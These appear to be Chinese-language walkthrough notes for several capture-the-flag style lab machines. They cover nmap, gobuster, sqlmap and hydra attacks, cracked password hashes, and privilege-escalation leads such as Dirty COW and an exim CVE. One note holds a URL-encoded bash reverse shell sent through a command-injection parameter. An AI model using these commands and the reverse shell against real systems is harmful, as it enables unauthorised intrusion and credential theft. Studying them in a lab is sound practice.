billu 端口扫描 nmap --min-rate 10000 -p- 192.168.30.157 # 开放了22,80端口 nmap --min-rate 10000 -p22,80,81 -sTVC -O -oA scan/detail 192.168.30.157 # udp端口扫描 nmap --min-rate 10000 -p- -sU -oA scan/udp 192.168.30.157 # 漏洞脚本扫描 namp --min-rate 10000 -script=vuln -p22,80 scan/vuln 192.168.30.157 vuln脚本找到两个路径。 服务探测 apache的默认页。 想到是目录爆破。 dirb http://192.168.30.131/ 等待目录爆破,看看其他两个路径。 http://192.168.30.131/test.php http://192.168.30.131/images woshizhizhang,这Ip不是我kali吗,艹。 新服务探测 按着ctrl创建多个光标批量修改。 dirb http://192.168.30.157/ http://192.168.30.157/ http://192.168.30.157/test.php http://192.168.30.157/images 测试上边这是个Post请求提交file参数,用于读取文件?待会测一下有没有SQL注入和文件包含漏洞。 sqlmap sqlmap -u http://192.168.30.157/ --data "un=user&ps=pass&login=let%27s+login" --level 4 --risk 3 sqlmap -u http://192.168.30.157/test.php --data "file=1" --level 4 --risk 3 没有成功。 ...
端口扫描 22和80。 页面检查中包含base编码路径。 远程代码执行 http://192.168.30.151/workinginprogress.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.30.131%2F4444%200%3E%261%27 SUID grep和find。 https://gtfobins.github.io/gtfobins/find/
端口扫描 nmap -sn --min-rate 10000 192.168.30.0/24 nmap --min-rate 10000 -p- 192.168.30.147 -Pn nmap --min-rate 10000 -sT -sV -sC -O -p22,80,81 -oA scan/detail 192.168.30.147 # 81是未开发端口 nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.147 nmap --min-rate 10000 -script=vuln -p22,80 -oA scan/vuln 192.168.30.147 可以看到80端口上可以看到文件。 服务探测 README.md下很明显是一堆16进制内容。 使用CyberChef转为二进制源文件。第一行可以看到这是JFIF的图片类型。数据以 0xFF, 0xD8, 0xFF, 0xE0 开头,这也是 JPEG/JFIF 图像文件头的标准标识符。 xxd -r -p README.txt output.jpg 可能一个用户名:Bob。 是个相册,下载图片分析隐写。 wget -r -l1 -nd -A "*.jpg" -P gallery http://192.168.30.147/ 命令选项解释 wget:下载文件的命令行工具。 -r:递归下载(Recursive retrieval)。这是必须的,因为我们要搜索目录下的文件。 -l1:设置递归深度为1。这意味着 wget 只会查看指定的 URL 页面,不会进入子目录。如果你的图片在更深的子目录中,可以移除此选项或增加数字(例如 -l inf 表示无限深度)。 -nd:不创建目录结构(No directories)。这会把所有下载的文件直接放在 -P 指定的目录下,而不是在 gallery 中再创建 192.168.30.147/ 这样的目录。 -A "*.jpg":接受(Accept)文件名后缀匹配 .jpg 的文件。这样可以只下载图片文件。 -P gallery:指定前缀(Prefix),即把所有下载的文件保存到名为 gallery 的目录下。 http://192.168.30.147/:目标URL。请确保这是一个可以通过 HTTP 访问的目录或页面,并且能列出或链接到目标 JPG 文件。 ...
hash破解 alan:6515229daf8dbdc8b89fed2e60f107433da5f2cb william:38882f3b81f8f2bc47d9f3119155b05f954892fb malik:0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 kevin:c6f7e34d5d08ba4a40dd5627508ccb55b425e279 ashley:553d917a396414ab99785694afd51df3a8a8a3e0 nick:ddf45997a7e18a25ad5f5cf222da64814dd060d5 sarah:d8b8dd5e7f000b8dea26ef8428caf38c04466b3e john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt bulldog (nick) bulldoglover (sarah) ./customPermissionApp <username>sudo su root SUPERultHimatePASHSWORDyouHCANTget dH34%(AWAVAAUATL[]A\A]A^A_ SUPERultimatePASHSWORDyouCANTget SUPERultimatePASSWORDyouCANTget
端口扫描 nmap --min-rate 10000 -sn 192.168.30.0/24 nmap --min-rate 10000 -p- -Pn 192.168.30.144 nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.144 nmap --min-rate 10000 -sT -sV -sC -O -p21,80,111,2049,7822,35313,40377,46457,55941 -Pn -oA scan/detail 192.168.30.144 nmap --min-rate 10000 -script=vuln -oA scan/vuln 192.168.30.144 21是ftp服务。 7822端口是ssh服务。 udp可以扫出来NFS服务。 服务探测 HTTP服务探测 登录页。查看源代码也没有特殊信息,文字描述大概就是我取名为m,你取名为n。 目录遍历。 gobuster dir -u http://192.168.30.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -o dir/dirscan /index.html (Status: 200) [Size: 1964] /images (Status: 301) [Size: 317] [--> http://192.168.30.144/images/] /manual (Status: 301) [Size: 317] [--> http://192.168.30.144/manual/] /javascript (Status: 301) [Size: 321] [--> http://192.168.30.144/javascript/] /hits.txt (Status: 200) [Size: 44] /backups (Status: 200) [Size: 6301] /backups.html (Status: 200) [Size: 325] /mysite (Status: 301) [Size: 317] [--> http://192.168.30.144/mysite/] /server-status (Status: 403) [Size: 302] /index.html首页源代码。存在注释部分。目前不知道是什么内容。 ...
端口扫描 80和7744(ssh)。 服务探测 浏览器打开http://192.168.30.158会被转换为http://dc-2/,页面显示如下。 原因是目标 Web 服务器(位于 192.168.30.158)在它的配置中设置了强制重定向。 一开始,我们从浏览器向目标 IP 地址 (192.168.30.158) 发起 TCP 连接,并发送请求。 http://192.168.30.158 请求头: GET / HTTP/1.1 Host: dc-2 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive 当Apache服务器接收到请求时,它检查请求头中的 Host 字段。请求头: Host: 192.168.30.158,不是预期的域名 (dc-2)。 服务器会发送一个 HTTP 响应给你的浏览器,其中包含一个特殊的响应头: curl -I 192.168.30.158 # -I 参数仅显示响应头部分 HTTP/1.1 301 Moved Permanently Date: Fri, 28 Nov 2025 09:38:33 GMT Server: Apache/2.4.10 (Debian) Location: http://dc-2/ Content-Type: text/html; charset=UTF-8 指纹识别 ...
端口扫描 22,80. 服务探测 Drupal 8内容管理框架。 在robots.txt有许多路径,但不是都能打开或有价值,翻了一遍后还是选择目录爆破。 目录爆破 gobuster dir -u http://192.168.30.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt http://192.168.30.159/core/install.php 收集到版本号Drupal 8.7.6。 http://192.168.30.159/INSTALL.txt http://192.168.30.159/core/INSTALL.txt 然后没思路了,去看了wp。思路很正常,但对于靶机太离奇。 去寻找作者源码仓库。 https://x.com/dc7user https://github.com/Dc7User/staffdb/blob/master/config.php <?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli_connect($servername, $username, $password, $dbname); ?> 登录ssh dc7user MdR3xOgB7#dW 发现有一个定时任务。 Pspy https://github.com/DominicBreuker/pspy pspy 是一款命令行工具,无需 root 权限即可监视进程。它允许您查看其他用户运行的命令、定时任务等的执行过程。非常适合在 CTF 比赛中枚举 Linux 系统。此外,它还能很好地向您的同事演示为什么在命令行中传递密钥参数是个糟糕的主意。 图中显示 /usr/sbin/exim4 -bd -q30m 正在运行。 exim4 在很多旧版本的 Debian/Ubuntu 靶机中是经典的提权点。如果是 4.87 到 4.91 之间,极大概率存在 CVE-2019-10149(The Return of the WIZard)。这是一个远程/本地代码执行漏洞,可以直接获取 Root 权限。 ...
端口扫描 nmap漏洞扫描枚举出两个路径。 | http-enum: | /info.php: Possible information file |_ /icons/: Potentially interesting folder w/ directory listing gobuster dir -u http://192.168.30.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -o dirscan.txt 这里目录扫描也没有有用信息。 尝试对ssh和mysql服务进行弱口令爆破。 hydra -l root -P /usr/share/wordlists/fasttrack.txt ssh://192.168.30.150 hydra -l root -P /usr/share/wordlists/fasttrack.txt mysql://192.168.30.150 mysql弱口令破解成功,没有显示密码,应该是空密码。 mysql -u root -p -h 192.168.30.150 --skip-ssl 数据库登录成功。 数据库信息收集 发现有一个ssh的数据库,里面存在users表。 成功拿到一组凭证。 用户名 密码 mistic testP@$$swordmistic mistic用户ssh 登录成功。 信息收集 sudo -l 无。 内核版本 [mistic@dpwwn-01 ~]$ uname -a Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux 低版本,可以使用脏牛提权。先继续收集其他信息。 ...
端口扫描 22,80。 漏洞脚本扫描。 枚举到路径: /robots.txt: Robots file /phpinfo.php: Possible information file /phpmyadmin/: phpMyAdmin robots.txt admin wordpress user election 目录爆破 /index.html (Status: 200) [Size: 10918] /javascript (Status: 301) [Size: 321] [--> http://192.168.30.128/javascript/] /robots.txt (Status: 200) [Size: 30] /election (Status: 301) [Size: 319] [--> http://192.168.30.128/election/] /phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.30.128/phpmyadmin/] /phpinfo.php (Status: 200) [Size: 95437] /server-status (Status: 403) [Size: 279] web网站路径/election。 是一个选举网站。仅有一位候选人。 输入Love,1都没反应,admin1会提示错误,似乎是个静态网页? robots.txt下的路径可以拼接在/election后面。抓包发现并没有post请求,依旧是静态? 对/election路径继续目录爆破。 /index.php (Status: 200) [Size: 7003] /media (Status: 301) [Size: 325] [--> http://192.168.30.128/election/media/] /themes (Status: 301) [Size: 326] [--> http://192.168.30.128/election/themes/] /data (Status: 301) [Size: 324] [--> http://192.168.30.128/election/data/] /admin (Status: 301) [Size: 325] [--> http://192.168.30.128/election/admin/] /lib (Status: 301) [Size: 323] [--> http://192.168.30.128/election/lib/] /languages (Status: 301) [Size: 329] [--> http://192.168.30.128/election/languages/] /js (Status: 301) [Size: 322] [--> http://192.168.30.128/election/js/] /card.php (Status: 200) [Size: 1935] 发现/card.php路径。 ...
端口扫描 wordpress专题 先目录扫描发现了/wrodpress目录。 利用wpsacn工具扫码,枚举用户。 wpsacn http://192.168.30.152 -e u wpscan http://192.168.30.152 -U '' -P /usr/share/wordlist/rockyou.txt 破解出账号密码。从/wp-login.php登录。 webshell方法一